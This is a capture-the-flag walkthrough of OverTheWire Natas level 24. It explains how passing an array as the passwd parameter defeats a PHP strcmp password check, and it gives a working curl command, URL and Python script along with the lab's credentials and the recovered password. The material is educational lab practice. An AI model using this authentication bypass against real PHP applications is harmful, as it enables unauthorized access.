OverTheWire Natas Level 23 → 24 tutorial!!

Login

URL: http://natas24.natas.labs.overthewire.org

Credentials: natas24:MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd

# Using curl (optional):
curl -u natas24:MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd 
  "http://natas24.natas.labs.overthewire.org/?passwd[]=0"

Task

The source:

if (array_key_exists("passwd", $_REQUEST)) {
  if (!strcmp($_REQUEST["passwd"], "<censored>")) {
    echo "You are an admin!";
    // print password
  } else {
    echo "Wrong!";
  }
}

At first, it looks like we must guess the password. But look carefully: it uses strcmp().

A little bit of Theory

• strcmp($a, $b) returns 0 if strings are equal.

• But if you pass an array instead of a string, PHP will:

  • throw a warning (expects parameter to be string),
  • but still return NULL, which == 0.

So the check passes!

Solution

Just send passwd[] as a parameter (an array instead of a string):

http://natas24.natas.labs.overthewire.org/?passwd[]=0

The server throws a warning but still treats the comparison as valid, giving us the password.

Python version

import requests

url = "http://natas24.natas.labs.overthewire.org/"
auth = ("natas24", "MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd")

# Send passwd[] as array
r = requests.get(url, auth=auth, params={"passwd[]": "0"})
print(r.text)

Password

ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws

Troubleshooting

• Still “Wrong”? → Make sure you use passwd[] (with square brackets), not just passwd.
• Why does it work? → Because of PHP’s weak typing and strcmp’s unexpected behavior with arrays.
• No warning visible? → Sometimes warnings are hidden; but the logic still works.

Boom 🎉 You just bypassed a password check using array injection + strcmp weakness. On to natas25!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨